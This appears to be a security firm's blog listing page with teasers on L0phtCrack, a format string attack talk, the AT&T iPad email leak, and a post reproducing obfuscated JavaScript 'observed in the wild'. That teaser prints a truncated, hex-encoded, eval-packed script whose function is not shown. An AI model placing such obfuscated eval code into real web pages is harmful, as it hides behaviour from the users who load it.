skip to Main Content
Talk to a Security Expert Now: (800) 721-9177

IT Security Blog

Independent research and articles on IT security, healthcare security, and hacking techniques.

Contact Us

L0phtCrack is back!

L0phtCrack was one of the original and greatest hacking and auditing tools of the 90's, essentially creating the modern LM/NTLM password auditing landscape. L0pht Heavy Industries - the creators of the tool - were instrumental in raising awareness of both the ease of cracking passwords as well the obviousness of how poorly people choose passwords.
Read More

Dangerous Javascript Observed in the Wild

Today, we observed some potentially dangerous Javascript client-side code out in the wild. The code, which we were able to obtain at great lengths, is reproduced below: _0x65f5=["x36x3Dx5Bx22x5Cx6Ax5Cx69x5Cx61x5Cx6Ex5Cx38x5Cx62x22x2Cx22x5Cx68x5Cx61x5Cx37x5Cx6Bx5Cx62x5Cx37x5Cx6Fx5Cx66x5Cx37x5Cx70x5Cx37x5Cx67x5Cx62x22x2Cx22x5Cx6Bx5Cx38x5Cx38x5Cx37x5Cx67x5Cx39x5Cx69x5Cx65x5Cx6Dx5Cx66x5Cx39x22x2Cx22x5Cx71x5Cx72x5Cx39x5Cx6Cx22x2Cx22x5Cx6Ax5Cx61x5Cx68x22x2Cx22x5Cx63x5Cx63x5Cx38x5Cx74x5Cx79x5Cx7Ax5Cx41x5Cx78x5Cx63x5Cx65x5Cx77x22x5Dx3Bx64x3Dx75x3Bx73x3Dx64x5Bx36x5Bx31x5Dx5Dx28x36x5Bx30x5Dx29x3Bx64x5Bx36x5Bx33x5Dx5Dx5Bx36x5Bx32x5Dx5Dx28x73x29x3Bx73x5Bx36x5Bx34x5Dx5Dx3Dx36x5Bx35x5Dx3Bx76x28x30x29x3B","x7C","x73x70x6Cx69x74","x7Cx7Cx7Cx7Cx7Cx7Cx5Fx30x78x65x30x61x32x7Cx78x36x35x7Cx78x37x30x7Cx78x36x34x7Cx78x37x32x7Cx78x37x34x7Cx78x32x46x7Cx7Cx78x36x38x7Cx78x36x43x7Cx78x36x45x7Cx78x36x33x7Cx78x34x33x7Cx78x37x33x7Cx78x36x31x7Cx78x37x39x7Cx78x36x39x7Cx78x34x39x7Cx78x34x35x7Cx78x36x44x7Cx78x36x32x7Cx78x36x46x7Cx7Cx78x33x33x7Cx64x6Fx63x75x6Dx65x6Ex74x7Cx76x4Fx49x64x7Cx78x37x41x7Cx78x35x33x7Cx78x34x45x7Cx78x32x45x7Cx78x37x35","","x66x72x6Fx6Dx43x68x61x72x43x6Fx64x65","x72x65x70x6Cx61x63x65","x5Cx77x2B","x5Cx62","x67"];eval(function (_0xf47fx1,_0xf47fx2,_0xf47fx3,_0xf47fx4,_0xf47fx5,_0xf47fx6){_0xf47fx5=function (_0xf47fx3){return (_0xf47fx335?String[_0x65f5[5]](_0xf47fx3+29):_0xf47fx3.toString(36));} ;if(!_0x65f5[4][_0x65f5[6]](/^/,String)){while(_0xf47fx3--){_0xf47fx6[_0xf47fx5(_0xf47fx3)]=_0xf47fx4[_0xf47fx3]||_0xf47fx5(_0xf47fx3);} ;_0xf47fx4=[function (_0xf47fx5){return _0xf47fx6[_0xf47fx5];} ];_0xf47fx5=function (){return _0x65f5[7];} ;_0xf47fx3=1;} ;while(_0xf47fx3--){if(_0xf47fx4[_0xf47fx3]){_0xf47fx1=_0xf47fx1[_0x65f5[6]](…

Read More

Defcon: Advanced Format String Attacks

Format string attacks remain difficult in both software and hackademic exercises as the techniques have not improved since their discovery. This session demonstrates advanced format string attack techniques designed to automate the process from creation to compromise as well as incorporate those techniques into the Metasploit framework. The audience is encouraged to bring a basic understanding of format string attacks in order to leave the presentation with the tools necessary to never write one again.
Read More

A bad Apple…

This week iPad owners had their emails leaked via a security vulnerability in the way iPads registered with AT&T's 3g service. Approximately 114,000 email addresses were brute forced from a script that was supposed to recognize an iPad owners ICC…

Read More
Back To Top